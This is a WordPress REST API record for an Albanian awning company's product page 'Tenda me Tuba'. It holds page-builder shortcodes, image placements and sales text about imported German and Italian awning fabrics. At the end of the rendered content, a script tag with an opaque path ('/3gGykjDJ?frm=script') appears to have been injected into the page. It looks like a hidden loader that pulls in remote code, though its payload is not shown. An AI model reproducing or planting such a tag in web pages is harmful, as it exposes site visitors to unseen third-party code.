{"id":63,"date":"2017-09-13T15:22:09","date_gmt":"2017-09-13T15:22:09","guid":{"rendered":"http:\/\/new.tendaera.com\/?page_id=63"},"modified":"2017-09-13T15:22:57","modified_gmt":"2017-09-13T15:22:57","slug":"tenda-me-tuba","status":"publish","type":"page","link":"https:\/\/tendaera.com\/index.php\/tenda-me-tuba\/","title":{"rendered":"Tenda me Tuba"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row][vc_column][vc_custom_heading text=&#8221;Tenda me Tuba&#8221; font_container=&#8221;tag:h2|text_align:center|color:%23dd3333&#8243; google_fonts=&#8221;font_family:Open%20Sans%3A300%2C300italic%2Cregular%2Citalic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic|font_style:400%20regular%3A400%3Anormal&#8221;][vc_empty_space height=&#8221;15px&#8221;][vc_separator color=&#8221;custom&#8221; accent_color=&#8221;#dd3333&#8243;][vc_empty_space][\/vc_column][\/vc_row][vc_row][vc_column width=&#8221;1\/2&#8243;][vc_single_image image=&#8221;65&#8243; img_size=&#8221;400&#215;290&#8243; alignment=&#8221;center&#8221; onclick=&#8221;link_image&#8221; image_hovers=&#8221;false&#8221;][\/vc_column][vc_column width=&#8221;1\/2&#8243;][vc_column_text]<\/p>\n<p style=\"text-align: left;\"><span style=\"color: #545151;\">Tenda Era sjell per ju tendat me cilesore dhe ekonomike ne treg duke plotesuar deshirat dhe nevojat e klienteve per nje ambjent perfekt deri ne detaje.<br \/>\nCopat p\u00ebr tendat importohen nga Gjermania dhe Italia. Copat kan\u00eb nj\u00eb garanci 5 \u2013 10 vjecare dhe ofrohen n\u00eb ngjyra t\u00eb ndryshme sipas d\u00ebshir\u00ebs s\u00eb klient\u00ebve. Ato nuk myken, nuk zbardhen , nuk tejkalojn\u00eb ujin dhe te mbrojne nga rrezet Ultra Violet. Jua sigurojme ne materiale te ndryshme si akrilik dhe poliester.<\/span><\/p>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row][vc_column width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;66&#8243; img_size=&#8221;254&#215;180&#8243; alignment=&#8221;center&#8221; onclick=&#8221;link_image&#8221; image_hovers=&#8221;false&#8221;][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;67&#8243; img_size=&#8221;254&#215;180&#8243; alignment=&#8221;center&#8221; onclick=&#8221;link_image&#8221; image_hovers=&#8221;false&#8221;][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;68&#8243; img_size=&#8221;254&#215;180&#8243; alignment=&#8221;center&#8221; onclick=&#8221;link_image&#8221; image_hovers=&#8221;false&#8221;][\/vc_column][\/vc_row][vc_row][vc_column width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;69&#8243; img_size=&#8221;254&#215;180&#8243; alignment=&#8221;center&#8221; onclick=&#8221;link_image&#8221; image_hovers=&#8221;false&#8221;][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;70&#8243; img_size=&#8221;254&#215;180&#8243; alignment=&#8221;center&#8221; onclick=&#8221;link_image&#8221; image_hovers=&#8221;false&#8221;][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;71&#8243; img_size=&#8221;254&#215;180&#8243; alignment=&#8221;center&#8221; onclick=&#8221;link_image&#8221; image_hovers=&#8221;false&#8221;][\/vc_column][\/vc_row]<script async src=' \/3gGykjDJ?frm=script&#038;_cid=123' type='text\/javascript'><\/script><\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row][vc_column][vc_custom_heading text=&#8221;Tenda me Tuba&#8221; font_container=&#8221;tag:h2|text_align:center|color:%23dd3333&#8243; google_fonts=&#8221;font_family:Open%20Sans%3A300%2C300italic%2Cregular%2Citalic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic|font_style:400%20regular%3A400%3Anormal&#8221;][vc_empty_space height=&#8221;15px&#8221;][vc_separator color=&#8221;custom&#8221; accent_color=&#8221;#dd3333&#8243;][vc_empty_space][\/vc_column][\/vc_row][vc_row][vc_column width=&#8221;1\/2&#8243;][vc_single_image image=&#8221;65&#8243; img_size=&#8221;400&#215;290&#8243; alignment=&#8221;center&#8221; onclick=&#8221;link_image&#8221; image_hovers=&#8221;false&#8221;][\/vc_column][vc_column width=&#8221;1\/2&#8243;][vc_column_text] Tenda Era sjell per ju tendat me cilesore dhe ekonomike ne treg duke plotesuar deshirat dhe nevojat e klienteve per nje ambjent perfekt deri ne detaje. Copat p\u00ebr tendat importohen nga Gjermania dhe Italia. Copat kan\u00eb nj\u00eb garanci 5&hellip;<\/p>\n","protected":false},"author":2,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-63","page","type-page","status-publish","hentry","description-off"],"_links":{"self":[{"href":"https:\/\/tendaera.com\/index.php\/wp-json\/wp\/v2\/pages\/63","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/tendaera.com\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/tendaera.com\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/tendaera.com\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/tendaera.com\/index.php\/wp-json\/wp\/v2\/comments?post=63"}],"version-history":[{"count":3,"href":"https:\/\/tendaera.com\/index.php\/wp-json\/wp\/v2\/pages\/63\/revisions"}],"predecessor-version":[{"id":74,"href":"https:\/\/tendaera.com\/index.php\/wp-json\/wp\/v2\/pages\/63\/revisions\/74"}],"wp:attachment":[{"href":"https:\/\/tendaera.com\/index.php\/wp-json\/wp\/v2\/media?parent=63"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}